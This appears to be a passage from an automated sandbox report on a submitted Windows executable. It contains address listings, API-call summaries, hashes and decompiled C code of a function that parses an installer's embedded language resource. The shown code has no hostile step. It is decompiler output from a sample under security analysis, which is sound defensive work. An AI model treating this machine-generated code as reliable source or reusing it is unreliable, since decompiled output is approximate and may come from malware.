                                                                                                                                                    0x0122c818
                                                                                                                                                    0x0122c825
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c809
                                                                                                                                                    0x0122c814
                                                                                                                                                    0x0122c816
                                                                                                                                                    0x0122c82a
                                                                                                                                                    0x0122c82a
                                                                                                                                                    0x0122c82c
                                                                                                                                                    0x0122c832
                                                                                                                                                    0x0122c838
                                                                                                                                                    0x0122c846
                                                                                                                                                    0x0122c84b
                                                                                                                                                    0x0122c84c
                                                                                                                                                    0x0122c854
                                                                                                                                                    0x0122c859
                                                                                                                                                    0x0122c860
                                                                                                                                                    0x0122c866
                                                                                                                                                    0x0122c868
                                                                                                                                                    0x0122c86e
                                                                                                                                                    0x0122c874
                                                                                                                                                    0x0122c876
                                                                                                                                                    0x0122c87f
                                                                                                                                                    0x0122c882
                                                                                                                                                    0x0122c884
                                                                                                                                                    0x0122c88d
                                                                                                                                                    0x0122c890
                                                                                                                                                    0x0122c896
                                                                                                                                                    0x0122c899
                                                                                                                                                    0x0122c8a2
                                                                                                                                                    0x0122c8b1
                                                                                                                                                    0x0122c8b6
                                                                                                                                                    0x0122c8be
                                                                                                                                                    0x0122c8c0
                                                                                                                                                    0x0122c8c1
                                                                                                                                                    0x0122c8c7
                                                                                                                                                    0x0122c8c8
                                                                                                                                                    0x0122c8ca
                                                                                                                                                    0x0122c8cf
                                                                                                                                                    0x0122c8cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c8be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c816
                                                                                                                                                    0x0122c807
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c8d7
                                                                                                                                                    0x0122c8da
                                                                                                                                                    0x0122c8dc
                                                                                                                                                    0x0122c8dc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c308
                                                                                                                                                    0x0122c310
                                                                                                                                                    0x0122c316
                                                                                                                                                    0x0122c319
                                                                                                                                                    0x0122c33d
                                                                                                                                                    0x0122c31b
                                                                                                                                                    0x0122c31b
                                                                                                                                                    0x0122c31e
                                                                                                                                                    0x0122c331
                                                                                                                                                    0x0122c320
                                                                                                                                                    0x0122c320
                                                                                                                                                    0x0122c322
                                                                                                                                                    0x0122c327
                                                                                                                                                    0x0122c327
                                                                                                                                                    0x0122c31e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122c381
                                                                                                                                                    0x0122c382
                                                                                                                                                    0x0122c387
                                                                                                                                                    0x0122c387
                                                                                                                                                    0x0122c387
                                                                                                                                                    0x0122c38a
                                                                                                                                                    0x0122c38f
                                                                                                                                                    0x0122c395
                                                                                                                                                    0x0122c395
                                                                                                                                                    0x0122c39b
                                                                                                                                                    0x0122c3a1
                                                                                                                                                    0x0122c3a1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bd98
                                                                                                                                                    0x0122bd9a
                                                                                                                                                    0x0122bd9f
                                                                                                                                                    0x0122bda5
                                                                                                                                                    0x0122bda8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bdaa
                                                                                                                                                    0x0122bdaa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122bdaa
                                                                                                                                                    0x0122c8e3
                                                                                                                                                    0x0122c8e3
                                                                                                                                                    0x0122c8e8
                                                                                                                                                    0x0122c8ec
                                                                                                                                                    0x0122c8f0
                                                                                                                                                    0x0122c8f7
                                                                                                                                                    0x0122c8fe
                                                                                                                                                    0x0122c901
                                                                                                                                                    0x0122c906
                                                                                                                                                    0x0122c909
                                                                                                                                                    0x0122c90c
                                                                                                                                                    0x0122c916

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0122BD3A
                                                                                                                                                      • Part of subcall function 0122A986: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0122AA4E
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 0122C062
                                                                                                                                                    • _wcsrchr.LIBVCRUNTIME ref: 0122C1EC
                                                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0122C227
                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0122C237
                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,01259472), ref: 0122C245
                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0122C270
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                    • API String ID: 3564274579-312220925
                                                                                                                                                    • Opcode ID: 20fbba6538649b01747cbd5d9d4da2c0bc491eb8d42770706d97564c24f417f1
                                                                                                                                                    • Instruction ID: 23258cad6b8c493fe7b900f1eca82cf39ff82425006863e5a3c14e0af0cb5ea0
                                                                                                                                                    • Opcode Fuzzy Hash: 20fbba6538649b01747cbd5d9d4da2c0bc491eb8d42770706d97564c24f417f1
                                                                                                                                                    • Instruction Fuzzy Hash: 1EE197B691022ABAEF25EBA4DD45DEE77BCEF15350F004066F659E3040EE709B848F61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121D281, Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E0121D281(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t200;
				void* _t201;
				WCHAR* _t202;
				void* _t207;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t232;
				void* _t233;
				void* _t236;
				signed int _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t252;
				signed int _t266;
				signed int _t271;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t277;
				void* _t278;
				signed int _t283;
				char* _t284;
				signed int _t288;
				short _t291;
				void* _t292;
				signed int _t298;
				signed int _t303;
				void* _t306;
				void* _t308;
				void* _t311;
				signed int _t320;
				intOrPtr* _t322;
				unsigned int _t332;
				signed int _t334;
				unsigned int _t337;
				signed int _t340;
				void* _t347;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				signed int _t361;
				signed int _t365;
				void* _t374;
				signed int _t376;
				signed int _t377;
				void* _t378;
				void* _t379;
				intOrPtr* _t380;
				signed int _t381;
				signed int _t384;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t388;
				intOrPtr* _t391;
				signed int _t393;
				void* _t394;
				void* _t396;
				void* _t398;
				void* _t402;
				void* _t403;

				_t374 = __edx;
				_t322 = __ecx;
				E0122E0E4(E01241D65, _t394);
				E0122E1C0();
				_t200 = 0x5c;
				_push(0x42f4);
				_push( *((intOrPtr*)(_t394 + 8)));
				_t391 = _t322;
				 *((intOrPtr*)(_t394 - 0x40)) = _t200;
				 *((intOrPtr*)(_t394 - 0x3c)) = _t391;
				_t201 = E01231438(_t322);
				_t320 = 0;
				_t400 = _t201;
				_t202 = _t394 - 0x12dc;
				if(_t201 != 0) {
					E0121FD96(_t202,  *((intOrPtr*)(_t394 + 8)), 0x800);
				} else {
					GetModuleFileNameW(0, _t202, 0x800);
					 *((short*)(E0121BBC5(_t400, _t394 - 0x12dc))) = 0;
					E0121FD6E(_t400, _t394 - 0x12dc,  *((intOrPtr*)(_t394 + 8)), 0x800);
				}
				E012195B6(_t394 - 0x2300);
				_push(4);
				 *(_t394 - 4) = _t320;
				_push(_t394 - 0x12dc);
				if(E01219950(_t394 - 0x2300, _t391) == 0) {
					L57:
					_t207 = E012195E8(_t394 - 0x2300, _t391); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t394 - 0xc));
					return _t207;
				} else {
					_t384 = _t320;
					_t402 =  *0x124d5f4 - _t384; // 0x63
					if(_t402 <= 0) {
						L7:
						E012358F0(_t320, _t384, _t391,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E0121CEF0);
						E012358F0(_t320, _t384, _t391,  *((intOrPtr*)(_t391 + 0x14)),  *((intOrPtr*)(_t391 + 0x18)), 4, E0121CE50);
						_t398 = _t396 + 0x20;
						 *(_t394 - 0x15) = _t320;
						_t385 = _t384 | 0xffffffff;
						 *(_t394 - 0x2c) = _t320;
						 *(_t394 - 0x20) = _t385;
						while(_t385 == 0xffffffff) {
							 *(_t394 - 0x10) = E01219D80();
							_t298 = E01219B80(_t374, _t394 - 0x4300, 0x2000);
							 *(_t394 - 0x28) = _t298;
							_t388 = _t320;
							_t25 = _t298 - 0x10; // -16
							_t365 = _t25;
							 *(_t394 - 0x30) = _t365;
							if(_t365 < 0) {
								L25:
								_t299 =  *(_t394 - 0x10);
								_t385 =  *(_t394 - 0x20);
								L26:
								E01219C70(_t394 - 0x2300, _t394, _t299 +  *(_t394 - 0x28) + 0xfffffff0, _t320, _t320);
								_t303 =  *(_t394 - 0x2c) + 1;
								 *(_t394 - 0x2c) = _t303;
								__eflags = _t303 - 0x100;
								if(_t303 < 0x100) {
									continue;
								}
								__eflags = _t385 - 0xffffffff;
								if(_t385 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t394 + _t388 - 0x4300)) != 0x2a ||  *((char*)(_t394 + _t388 - 0x42ff)) != 0x2a) {
									L14:
									_t374 = 0x2a;
									if( *((intOrPtr*)(_t394 + _t388 - 0x4300)) != _t374) {
										L18:
										if( *((char*)(_t394 + _t388 - 0x4300)) != 0x52 ||  *((char*)(_t394 + _t388 - 0x42ff)) != 0x61) {
											L21:
											_t388 = _t388 + 1;
											if(_t388 >  *(_t394 - 0x30)) {
												goto L25;
											}
											_t298 =  *(_t394 - 0x28);
											continue;
										} else {
											_t306 = E01235D20(_t394 - 0x42fe + _t388, 0x12428ec, 4);
											_t398 = _t398 + 0xc;
											if(_t306 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t370 = _t394 - 0x42fc + _t388;
									if( *((intOrPtr*)(_t394 - 0x42fc + _t388 - 2)) == _t374 && _t388 <= _t298 + 0xffffffe0) {
										_t308 = E01235668(_t370, L"*messages***", 0xb);
										_t398 = _t398 + 0xc;
										if(_t308 == 0) {
											 *(_t394 - 0x15) = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t311 = E01235D20(_t394 - 0x42fe + _t388, "*messages***", 0xb);
									_t398 = _t398 + 0xc;
									if(_t311 == 0) {
										L24:
										_t299 =  *(_t394 - 0x10);
										_t385 = _t388 +  *(_t394 - 0x10);
										 *(_t394 - 0x20) = _t385;
										goto L26;
									}
									_t298 =  *(_t394 - 0x28);
									goto L14;
								}
							}
						}
						asm("cdq");
						E01219C70(_t394 - 0x2300, _t394, _t385, _t374, _t320);
						_push(0x200002);
						_t386 = E01233413(_t394 - 0x2300);
						 *(_t394 - 0x1c) = _t386;
						__eflags = _t386;
						if(_t386 == 0) {
							goto L57;
						}
						_t332 = E01219B80(_t374, _t386, 0x200000);
						 *(_t394 - 0x20) = _t332;
						__eflags =  *(_t394 - 0x15);
						if( *(_t394 - 0x15) == 0) {
							_push(2 + _t332 * 2);
							_t216 = E01233413(_t332);
							 *(_t394 - 0x30) = _t216;
							__eflags = _t216;
							if(_t216 == 0) {
								goto L57;
							}
							_t334 =  *(_t394 - 0x20);
							 *(_t334 + _t386) = _t320;
							__eflags = _t334 + 1;
							E012212D6(_t386, _t216, _t334 + 1);
							L0123340E(_t386);
							_t386 =  *(_t394 - 0x30);
							_t337 =  *(_t394 - 0x20);
							 *(_t394 - 0x1c) = _t386;
							L33:
							_t219 = 0x100000;
							__eflags = _t337 - 0x100000;
							if(_t337 <= 0x100000) {
								_t219 = _t337;
							}
							 *((short*)(_t386 + _t219 * 2)) = 0;
							E0121FD3B(_t394 - 0x14c, 0x12428f4, 0x64);
							_push(0x20002);
							_t222 = E01233413(0);
							 *(_t394 - 0x10) = _t222;
							__eflags = _t222;
							if(_t222 != 0) {
								__eflags =  *(_t394 - 0x20);
								_t340 = _t320;
								_t375 = _t320;
								 *(_t394 - 0x14) = _t340;
								 *(_t394 - 0x84) = _t320;
								_t387 = _t320;
								 *(_t394 - 0x28) = _t320;
								if( *(_t394 - 0x20) <= 0) {
									L54:
									E0121CDB2(_t391, _t375, _t394 - 0x84, _t222, _t340);
									L0123340E( *(_t394 - 0x1c));
									L0123340E( *(_t394 - 0x10));
									__eflags =  *((intOrPtr*)(_t391 + 0x2c)) - _t320;
									if( *((intOrPtr*)(_t391 + 0x2c)) <= _t320) {
										L56:
										 *0x124ff94 =  *((intOrPtr*)(_t391 + 0x28));
										E012358F0(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x3c)),  *((intOrPtr*)(_t391 + 0x40)), 4, E0121CFB0);
										E012358F0(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x50)),  *((intOrPtr*)(_t391 + 0x54)), 4, E0121CFE0);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E012236F1(_t391 + 0x3c, _t375, _t320);
										E012236F1(_t391 + 0x50, _t375, _t320);
										_t320 = _t320 + 1;
										__eflags = _t320 -  *((intOrPtr*)(_t391 + 0x2c));
									} while (_t320 <  *((intOrPtr*)(_t391 + 0x2c)));
									goto L56;
								}
								 *((intOrPtr*)(_t394 - 0x34)) = 0xd;
								 *((intOrPtr*)(_t394 - 0x38)) = 0xa;
								 *(_t394 - 0x30) = 9;
								do {
									_t232 =  *(_t394 - 0x1c);
									__eflags = _t387;
									if(_t387 == 0) {
										L80:
										_t376 =  *(_t232 + _t387 * 2) & 0x0000ffff;
										_t387 = _t387 + 1;
										__eflags = _t376;
										if(_t376 == 0) {
											break;
										}
										__eflags = _t376 -  *((intOrPtr*)(_t394 - 0x40));
										if(_t376 !=  *((intOrPtr*)(_t394 - 0x40))) {
											_t233 = 0xd;
											__eflags = _t376 - _t233;
											if(_t376 == _t233) {
												L99:
												E0121CDB2(_t391,  *(_t394 - 0x28), _t394 - 0x84,  *(_t394 - 0x10), _t340);
												 *(_t394 - 0x84) = _t320;
												_t340 = _t320;
												 *(_t394 - 0x28) = _t320;
												L98:
												 *(_t394 - 0x14) = _t340;
												goto L52;
											}
											_t236 = 0xa;
											__eflags = _t376 - _t236;
											if(_t376 == _t236) {
												goto L99;
											}
											L96:
											__eflags = _t340 - 0x10000;
											if(_t340 >= 0x10000) {
												goto L52;
											}
											 *( *(_t394 - 0x10) + _t340 * 2) = _t376;
											_t340 = _t340 + 1;
											__eflags = _t340;
											goto L98;
										}
										__eflags = _t340 - 0x10000;
										if(_t340 >= 0x10000) {
											goto L52;
										}
										_t239 = ( *(_t232 + _t387 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0x22);
											L93:
											_pop(_t381);
											 *( *(_t394 - 0x10) + _t340 * 2) = _t381;
											_t340 = _t340 + 1;
											 *(_t394 - 0x14) = _t340;
											_t387 = _t387 + 1;
											goto L52;
										}
										_t241 = _t239 - 0x3a;
										__eflags = _t241;
										if(_t241 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t242 = _t241 - 0x12;
										__eflags = _t242;
										if(_t242 == 0) {
											_push(0xa);
											goto L93;
										}
										_t243 = _t242 - 4;
										__eflags = _t243;
										if(_t243 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t243 != 0;
										if(_t243 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t377 =  *(_t232 + _t387 * 2 - 2) & 0x0000ffff;
									__eflags = _t377 -  *((intOrPtr*)(_t394 - 0x34));
									if(_t377 ==  *((intOrPtr*)(_t394 - 0x34))) {
										L42:
										_t347 = 0x3a;
										__eflags =  *(_t232 + _t387 * 2) - _t347;
										if( *(_t232 + _t387 * 2) != _t347) {
											L71:
											 *(_t394 - 0x24) = _t232 + _t387 * 2;
											_t248 = E0121FBFF( *(_t232 + _t387 * 2) & 0x0000ffff);
											__eflags = _t248;
											if(_t248 == 0) {
												L79:
												_t340 =  *(_t394 - 0x14);
												_t232 =  *(_t394 - 0x1c);
												goto L80;
											}
											E0121FD96(_t394 - 0x2dc,  *(_t394 - 0x24), 0x64);
											_t252 = E012356E5(_t394 - 0x2dc, L" \t,");
											 *(_t394 - 0x24) = _t252;
											__eflags = _t252;
											if(_t252 == 0) {
												goto L79;
											}
											 *_t252 = 0;
											E012214F2(_t394 - 0x2dc, _t394 - 0x1b0, 0x64);
											E0121FD3B(_t394 - 0xe8, _t394 - 0x14c, 0x64);
											E0121FD14(__eflags, _t394 - 0xe8, _t394 - 0x1b0, 0x64);
											E0121FD3B(_t394 - 0x84, _t394 - 0xe8, 0x32);
											_t266 = E01235739(_t320, 0, _t387, _t391, _t394 - 0xe8,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E0121CF90);
											_t398 = _t398 + 0x14;
											__eflags = _t266;
											if(_t266 != 0) {
												_t272 =  *_t266 * 0xc;
												__eflags = _t272;
												_t169 = _t272 + 0x124d150; // 0x28b64ee0
												 *(_t394 - 0x28) =  *_t169;
											}
											_t387 = _t387 + ( *(_t394 - 0x24) - _t394 - 0x2dc >> 1) + 1;
											__eflags = _t387;
											_t271 =  *(_t394 - 0x1c);
											_t378 = 0x20;
											while(1) {
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												L77:
												__eflags = _t352 -  *(_t394 - 0x30);
												if(_t352 !=  *(_t394 - 0x30)) {
													L51:
													_t340 =  *(_t394 - 0x14);
													goto L52;
												}
												L78:
												_t387 = _t387 + 1;
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												goto L77;
											}
										}
										_t393 =  *(_t394 - 0x1c);
										_t274 = _t232 | 0xffffffff;
										__eflags = _t274;
										 *(_t394 - 0x2c) = _t274;
										 *(_t394 - 0x50) = L"STRINGS";
										 *(_t394 - 0x4c) = L"DIALOG";
										 *(_t394 - 0x48) = L"MENU";
										 *(_t394 - 0x44) = L"DIRECTION";
										 *(_t394 - 0x24) = _t320;
										do {
											 *(_t394 - 0x24) = E012333F3( *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)));
											_t276 = E01235668(_t393 + 2 + _t387 * 2,  *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)), _t275);
											_t398 = _t398 + 0x10;
											_t379 = 0x20;
											__eflags = _t276;
											if(_t276 != 0) {
												L47:
												_t277 =  *(_t394 - 0x2c);
												goto L48;
											}
											_t361 =  *(_t394 - 0x24) + _t387;
											__eflags =  *((intOrPtr*)(_t393 + 2 + _t361 * 2)) - _t379;
											if( *((intOrPtr*)(_t393 + 2 + _t361 * 2)) > _t379) {
												goto L47;
											}
											_t277 = _t320;
											_t107 = _t361 + 1; // 0x200001
											_t387 = _t107;
											 *(_t394 - 0x2c) = _t277;
											L48:
											_t320 = _t320 + 1;
											__eflags = _t320 - 4;
										} while (_t320 < 4);
										_t391 =  *((intOrPtr*)(_t394 - 0x3c));
										_t320 = 0;
										__eflags = _t277;
										if(__eflags != 0) {
											_t232 =  *(_t394 - 0x1c);
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												L60:
												__eflags = _t355 -  *(_t394 - 0x30);
												if(_t355 !=  *(_t394 - 0x30)) {
													_t380 = _t232 + _t387 * 2;
													 *(_t394 - 0x24) = _t320;
													_t278 = 0x20;
													_t356 = _t320;
													__eflags =  *_t380 - _t278;
													if( *_t380 <= _t278) {
														L66:
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = 0;
														E012214F2(_t394 - 0x214, _t394 - 0xe8, 0x64);
														_t387 = _t387 +  *(_t394 - 0x24);
														_t283 =  *(_t394 - 0x2c);
														__eflags = _t283 - 3;
														if(_t283 != 3) {
															__eflags = _t283 - 1;
															_t284 = "$%s:";
															if(_t283 != 1) {
																_t284 = "@%s:";
															}
															E0121DCAB(_t394 - 0x14c, 0x64, _t284, _t394 - 0xe8);
															_t398 = _t398 + 0x10;
														} else {
															_t288 = E01233429(_t394 - 0x214, _t394 - 0x214, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t391 + 0x64)) =  ~_t288 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t356 - 0x63;
														if(_t356 >= 0x63) {
															break;
														}
														_t291 =  *_t380;
														_t380 = _t380 + 2;
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = _t291;
														_t356 = _t356 + 1;
														_t292 = 0x20;
														__eflags =  *_t380 - _t292;
														if( *_t380 > _t292) {
															continue;
														}
														break;
													}
													 *(_t394 - 0x24) = _t356;
													goto L66;
												}
												L61:
												_t387 = _t387 + 1;
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												goto L60;
											}
										}
										E0121FD3B(_t394 - 0x14c, 0x12428f4, 0x64);
										goto L51;
									}
									_t83 = _t394 - 0x38; // 0xa
									__eflags = _t377 -  *_t83;
									if(_t377 !=  *_t83) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t387 -  *(_t394 - 0x20);
								} while (_t387 <  *(_t394 - 0x20));
								_t222 =  *(_t394 - 0x10);
								_t375 =  *(_t394 - 0x28);
								goto L54;
							} else {
								L0123340E(_t386);
								goto L57;
							}
						}
						_t337 = _t332 >> 1;
						 *(_t394 - 0x20) = _t337;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E012236F1(_t391, _t374, _t384);
						E012236F1(_t391 + 0x14, _t374, _t384);
						_t384 = _t384 + 1;
						_t403 = _t384 -  *0x124d5f4; // 0x63
					} while (_t403 < 0);
					_t320 = 0;
					goto L7;
				}
			}






































































                                                                                                                                                    0x0121d281
                                                                                                                                                    0x0121d281
                                                                                                                                                    0x0121d286
                                                                                                                                                    0x0121d290
                                                                                                                                                    0x0121d29a
                                                                                                                                                    0x0121d29b
                                                                                                                                                    0x0121d29c
                                                                                                                                                    0x0121d29f
                                                                                                                                                    0x0121d2a1
                                                                                                                                                    0x0121d2a4
                                                                                                                                                    0x0121d2a7
                                                                                                                                                    0x0121d2ad
                                                                                                                                                    0x0121d2af
                                                                                                                                                    0x0121d2b2
                                                                                                                                                    0x0121d2b8
                                                                                                                                                    0x0121d2f4
                                                                                                                                                    0x0121d2ba
                                                                                                                                                    0x0121d2c2
                                                                                                                                                    0x0121d2da
                                                                                                                                                    0x0121d2e4
                                                                                                                                                    0x0121d2e4
                                                                                                                                                    0x0121d2ff
                                                                                                                                                    0x0121d304
                                                                                                                                                    0x0121d30c
                                                                                                                                                    0x0121d30f
                                                                                                                                                    0x0121d31d
                                                                                                                                                    0x0121d6e0
                                                                                                                                                    0x0121d6e6
                                                                                                                                                    0x0121d6f1
                                                                                                                                                    0x0121d6fb
                                                                                                                                                    0x0121d323
                                                                                                                                                    0x0121d323
                                                                                                                                                    0x0121d325
                                                                                                                                                    0x0121d32b
                                                                                                                                                    0x0121d349
                                                                                                                                                    0x0121d355
                                                                                                                                                    0x0121d367
                                                                                                                                                    0x0121d36c
                                                                                                                                                    0x0121d36f
                                                                                                                                                    0x0121d372
                                                                                                                                                    0x0121d375
                                                                                                                                                    0x0121d378
                                                                                                                                                    0x0121d37b
                                                                                                                                                    0x0121d38f
                                                                                                                                                    0x0121d3a4
                                                                                                                                                    0x0121d3a9
                                                                                                                                                    0x0121d3ac
                                                                                                                                                    0x0121d3ae
                                                                                                                                                    0x0121d3ae
                                                                                                                                                    0x0121d3b1
                                                                                                                                                    0x0121d3b6
                                                                                                                                                    0x0121d475
                                                                                                                                                    0x0121d475
                                                                                                                                                    0x0121d478
                                                                                                                                                    0x0121d47b
                                                                                                                                                    0x0121d48c
                                                                                                                                                    0x0121d494
                                                                                                                                                    0x0121d495
                                                                                                                                                    0x0121d498
                                                                                                                                                    0x0121d49d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d4a3
                                                                                                                                                    0x0121d4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d4a6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d3bc
                                                                                                                                                    0x0121d3c4
                                                                                                                                                    0x0121d3ef
                                                                                                                                                    0x0121d3f1
                                                                                                                                                    0x0121d3fa
                                                                                                                                                    0x0121d425
                                                                                                                                                    0x0121d42d
                                                                                                                                                    0x0121d459
                                                                                                                                                    0x0121d459
                                                                                                                                                    0x0121d45d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d45f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d439
                                                                                                                                                    0x0121d449
                                                                                                                                                    0x0121d44e
                                                                                                                                                    0x0121d453
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d453
                                                                                                                                                    0x0121d42d
                                                                                                                                                    0x0121d402
                                                                                                                                                    0x0121d408
                                                                                                                                                    0x0121d419
                                                                                                                                                    0x0121d41e
                                                                                                                                                    0x0121d423
                                                                                                                                                    0x0121d467
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d467
                                                                                                                                                    0x0121d423
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d3d0
                                                                                                                                                    0x0121d3e0
                                                                                                                                                    0x0121d3e5
                                                                                                                                                    0x0121d3ea
                                                                                                                                                    0x0121d46b
                                                                                                                                                    0x0121d46b
                                                                                                                                                    0x0121d46e
                                                                                                                                                    0x0121d470
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d470
                                                                                                                                                    0x0121d3ec
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d3ec
                                                                                                                                                    0x0121d3c4
                                                                                                                                                    0x0121d3bc
                                                                                                                                                    0x0121d4b5
                                                                                                                                                    0x0121d4b8
                                                                                                                                                    0x0121d4bd
                                                                                                                                                    0x0121d4c7
                                                                                                                                                    0x0121d4c9
                                                                                                                                                    0x0121d4cd
                                                                                                                                                    0x0121d4cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d4e6
                                                                                                                                                    0x0121d4eb
                                                                                                                                                    0x0121d4ee
                                                                                                                                                    0x0121d4f0
                                                                                                                                                    0x0121d500
                                                                                                                                                    0x0121d501
                                                                                                                                                    0x0121d506
                                                                                                                                                    0x0121d50a
                                                                                                                                                    0x0121d50c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d512
                                                                                                                                                    0x0121d515
                                                                                                                                                    0x0121d518
                                                                                                                                                    0x0121d51c
                                                                                                                                                    0x0121d522
                                                                                                                                                    0x0121d527
                                                                                                                                                    0x0121d52b
                                                                                                                                                    0x0121d52e
                                                                                                                                                    0x0121d531
                                                                                                                                                    0x0121d531
                                                                                                                                                    0x0121d536
                                                                                                                                                    0x0121d538
                                                                                                                                                    0x0121d53a
                                                                                                                                                    0x0121d53a
                                                                                                                                                    0x0121d540
                                                                                                                                                    0x0121d550
                                                                                                                                                    0x0121d555
                                                                                                                                                    0x0121d55a
                                                                                                                                                    0x0121d55f
                                                                                                                                                    0x0121d563
                                                                                                                                                    0x0121d565
                                                                                                                                                    0x0121d573
                                                                                                                                                    0x0121d577
                                                                                                                                                    0x0121d579
                                                                                                                                                    0x0121d57b
                                                                                                                                                    0x0121d57e
                                                                                                                                                    0x0121d584
                                                                                                                                                    0x0121d586
                                                                                                                                                    0x0121d589
                                                                                                                                                    0x0121d671
                                                                                                                                                    0x0121d67d
                                                                                                                                                    0x0121d685
                                                                                                                                                    0x0121d68d
                                                                                                                                                    0x0121d694
                                                                                                                                                    0x0121d697
                                                                                                                                                    0x0121d6b1
                                                                                                                                                    0x0121d6be
                                                                                                                                                    0x0121d6c6
                                                                                                                                                    0x0121d6d8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d699
                                                                                                                                                    0x0121d699
                                                                                                                                                    0x0121d69d
                                                                                                                                                    0x0121d6a6
                                                                                                                                                    0x0121d6ab
                                                                                                                                                    0x0121d6ac
                                                                                                                                                    0x0121d6ac
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d699
                                                                                                                                                    0x0121d58f
                                                                                                                                                    0x0121d596
                                                                                                                                                    0x0121d59d
                                                                                                                                                    0x0121d5a4
